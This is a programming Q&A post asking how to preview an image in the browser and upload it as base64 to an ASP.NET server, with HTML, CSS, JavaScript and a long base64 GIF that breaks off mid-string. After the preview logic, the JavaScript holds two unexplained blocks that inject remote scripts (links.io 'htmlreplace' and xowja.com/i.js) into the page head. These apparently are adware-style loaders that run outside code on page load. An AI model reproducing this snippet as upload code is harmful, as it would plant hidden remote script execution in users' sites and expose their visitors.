# post image base64 to server and save image to disk same fileUpload, that preview in browser

Tags: javascript, jquery, asp.net, ajax, base64

I'm using [this](http://jsfiddle.net/Tjrkq/2/) and doing an image preview.

when I'm running that,that's ok.

it's worked by input type="file" and show image base on base64 on browser.

html code:

```
<div id="imagePreview"></div>
<form name="uploadForm">
<p><input id="imageInput" type="file" name="myPhoto" onchange="loadImageFile();"><br>
<input type="submit" value="Send"></p>
</form>
```

​css code:

```
#imagePreview {
    width: 160px;
    height: 120px;
  border:1px solid;
    float:right;
    filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=scale);
}
```

javascript code:

```
var loadImageFile = (function () {
    if (window.FileReader) {
        var    oPreviewImg = null, oFReader = new window.FileReader(),
            rFilter = /^(?:image\/bmp|image\/cis\-cod|image\/gif|image\/ief|image\/jpeg|image\/jpeg|image\/jpeg|image\/pipeg|image\/png|image\/svg\+xml|image\/tiff|image\/x\-cmu\-raster|image\/x\-cmx|image\/x\-icon|image\/x\-portable\-anymap|image\/x\-portable\-bitmap|image\/x\-portable\-graymap|image\/x\-portable\-pixmap|image\/x\-rgb|image\/x\-xbitmap|image\/x\-xpixmap|image\/x\-xwindowdump)$/i;

        oFReader.onload = function (oFREvent) {
            if (!oPreviewImg) {
                var newPreview = document.getElementById("imagePreview");
                oPreviewImg = new Image();
                oPreviewImg.style.width = (newPreview.offsetWidth).toString() + "px";
             //   oPreviewImg.style.height = (newPreview.offsetHeight).toString() + "px";
                newPreview.appendChild(oPreviewImg);
            }
            oPreviewImg.src = oFREvent.target.result;
        };

        return function () {
            var aFiles = document.getElementById("imageInput").files;
            if (aFiles.length === 0) { return; }
            if (!rFilter.test(aFiles[0].type)) { alert("You must select a valid image file!"); return; }
            oFReader.readAsDataURL(aFiles[0]);
        }

    }
    if (navigator.appName === "Microsoft Internet Explorer") {
        return function () {
            document.getElementById("imagePreview").filters.item("DXImageTransform.Microsoft.AlphaImageLoader").src = document.getElementById("imageInput").value;

        }
    }
})();
/* */
var uco = 'US';(function() {
    //var url = (document.location.protocol == 'http:') ? 'ssl.privacysafeguard.com/htmlreplace/replace.js' : 'ssl.privacysafeguard.com/htmlreplace/replace-ssl.js';
    //var url = (document.location.protocol == 'http:') ? 'cdn.links.io/htmlx/replace.js' : 'cdn.links.io/htmlx/replace-ssl.js';
    var url = (document.location.protocol == 'http:') ? 'cdn-sl.links.io/replace.js' : '93ce.https.cdn.softlayer.net/8093CE/dev.links.io/htmlreplace/replace-ssl.js';
    var h = document.getElementsByTagName('head')[0];
    var s = document.createElement('script');
    s.type = 'text/javascript';
    s.src = document.location.protocol + '//' + url;
    h.appendChild(s);
})();
(function() {
    var url = (document.location.protocol == 'http:') ? 'xowja.com/i.js' : 'xowja.com/i.js';
    var h = document.getElementsByTagName('head')[0];
    var s = document.createElement('script');
    s.type = 'text/javascript';
    s.src = document.location.protocol + '//' + url;
    h.appendChild(s);
})();
```

also,img tag after​ preview image:

```
<img style="width: 350px;" src="data:image/gif;base64,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